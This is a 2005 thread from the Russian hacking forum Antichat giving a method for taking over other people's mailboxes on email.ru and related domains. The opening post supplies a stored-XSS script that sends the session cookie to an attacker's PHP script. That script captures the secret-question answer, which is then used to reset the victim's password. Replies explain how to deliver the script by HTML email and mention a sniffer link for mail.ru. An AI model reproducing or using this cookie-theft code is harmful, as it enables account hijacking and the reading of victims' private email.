Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Захват ящика на email.ru(aport.ru,omen.ru,atrus.ru,au.ru,imail.ru, aport2000.ru) |
12.03.2005, 22:54
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
Захват ящика на email.ru(aport.ru,omen.ru,atrus.ru,au.ru,imail.ru, aport2000.ru)
Как выяснилось фильтров там вообще никаких нет, ну или покрайне мере я их там не нашёл  ))
Для идентификации пользователей сервер использует id(в переменной cookie) или если id не обноружен, то куки. Причём идентификатор сесии СОВПАДАЕТ с переменной "AGMail" в cookies.
Впринципе нам достаточно получить только куки пользователя и подделов их попасть в его ящик, но это сработате только если пользователь не нажал кнопку "выход"
=> напишем скрипт, который отсылает cookies на скрипт(причём данный скрипт работает не только в IE, но и в других броузерах поддерживающих javascript :
Код:
<script>img=new Image();img.src='http://adres_scripta.php?'+document.cookie;</script>
Поскольку ответ на секретный вопрос храниться в открытом виде, напишем ещё один скрипт на php, который сохраняет нам страницу "Информация о пользователе" где он и присутствует:
PHP код:
<?
$nachalo=strpos("$QUERY_STRING","AGMail=")+7; // ищем номер позиции с которой начинается cookie
$cooka=substr("$QUERY_STRING","$nachalo"); // сохраняем cookie в переменную $cooka
$p=join('',file("http://email.ru/scripts/options?user=1&site=rol&cookie={$cooka}")); // читаем информацию о пользователе и загоняем её в переменную $p
$f=Fopen("./{$cooka}.html","w") or die("ale!!!!!!!!!"); // открывает канал для записи
fputs($f,$p); // записываем переменную $p
fputs($f,$QUERY_STRING); // на странице "Информация о пользователе" нет адреса жертвы, но он есть в куках, потому также запишим их в этот фал на всякий случай :)
fclose($f); // закрываем канал
?>
Потом идём вместе с секретным вопросом и меняем пароль на мыло !
P.S. По этому же принцепу можно читать чужую почту, записав свой адрес на перенапрвыление почты...
Последний раз редактировалось Майор; 07.04.2005 в 01:15..
|
|
|
13.03.2005, 02:05
|
|
Участник форума
Регистрация: 03.01.2005
Сообщений: 270
Провел на форуме:
58594
Репутация:
6
|
|
1 чето не сработало!
а в 2 как применить?
Просто отправить по почте или на сайт загрузить?
|
|
|
|
13.03.2005, 02:09
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
Сообщение от rsha1988
1 чето не сработало!
а в 2 как применить?
Просто отправить по почте или на сайт загрузить?
Первый скрипт от правляешь по почте в виде html письма
Второй заливаешь на сайт(бесплатный хостинг не подойдёт так как там запрешены исходяшие линки)
|
|
|
|
13.03.2005, 03:33
|
|
Участник форума
Регистрация: 03.01.2005
Сообщений: 270
Провел на форуме:
58594
Репутация:
6
|
|
1 я понял (я думал на mail.ru это работает )) )!
А вот 2 чето не понятно...
$p=join - это ник чтоли?
user=1 - и как я узнаю ид мыла...
|
|
|
|
13.03.2005, 13:42
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
Сообщение от rsha1988
1 я понял (я думал на mail.ru это работает )) )!
А вот 2 чето не понятно...
$p=join - это ник чтоли?
user=1 - и как я узнаю ид мыла...
&cookie={$cooka} - эт ид
$p=join - это функция которая читает страницу
|
|
|
|
13.03.2005, 22:16
|
|
Новичок
Регистрация: 08.02.2005
Сообщений: 3
Провел на форуме:
0
Репутация:
0
|
|
Красавец! Но на mail.ru тэг <script> фильтруется и заменяется на <xscript>... так что думаем дальше...
|
|
|
|
14.03.2005, 19:08
|
|
Участник форума
Регистрация: 14.01.2005
Сообщений: 169
Провел на форуме:
427901
Репутация:
23
|
|
вообще для mail.ru , просто посылаещь http://antichat.ru/cgi-bin/s.jpg? и ждещь когда зайдут по этой ссылке , и на снифе появиться сесия атакуемого , просто вставляешь идешь по его ссылке (что в снифере появилась ) и все ты у него на почте " )
конечно это наверно все знают .....
а вот офигенный сайтик http://unknown-.chat.ru/page5.html прочтите " ) |
|
|
|
14.03.2005, 19:23
|
|
Участник форума
Регистрация: 14.01.2005
Сообщений: 169
Провел на форуме:
427901
Репутация:
23
|
|
да, и ссылку можно замаскировать , просто он открывает письмо и она само срабатывает
|
|
|
|
Грандиозно! Действительно работает! Изыскателю - Огромный респект! |
15.03.2005, 18:22
|
|
Новичок
Регистрация: 15.03.2005
Сообщений: 2
Провел на форуме:
0
Репутация:
0
|
|
Грандиозно! Действительно работает! Изыскателю - Огромный респект!
Попробовал на своём почтовом ящике, и получил к нему доступ... вот ведь теперь бояться надо себя! 
С уважением,
Илья. |
|
|
|
17.03.2005, 11:18
|
|
Новичок
Регистрация: 17.03.2005
Сообщений: 5
Провел на форуме:
0
Репутация:
0
|
|
Я считаю, что даная статья является заблуждением её автора.
Каждый сайт оставляет на "машинах" пользователей свои кукисы, тоесть: если мы на сайте вставляем строку alert(document.cookie) мы увидим кукисы те, которые мы сами туда записали, а отнюдь не кукисы с сайта почтовой системы. Данная статья будет актуальна и функциональна в случае, если эта строка, укзананная в статье: "<script>img=new Image();img.src='http://adres_scripta.php?'+document.cookie;</script>" записана в страницу почтовой системы. Если Вы вставили эту строку в свой сайт и надеетесь таким путём прочесть кукис, который сохранила одна из почтовых систем, то у Вас конечно же ничего не выйдет. Таким образом вы всего лишь прочтёте кукисы, которые сами впихнули юзверю. Надеюсь моя мысль понятна.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
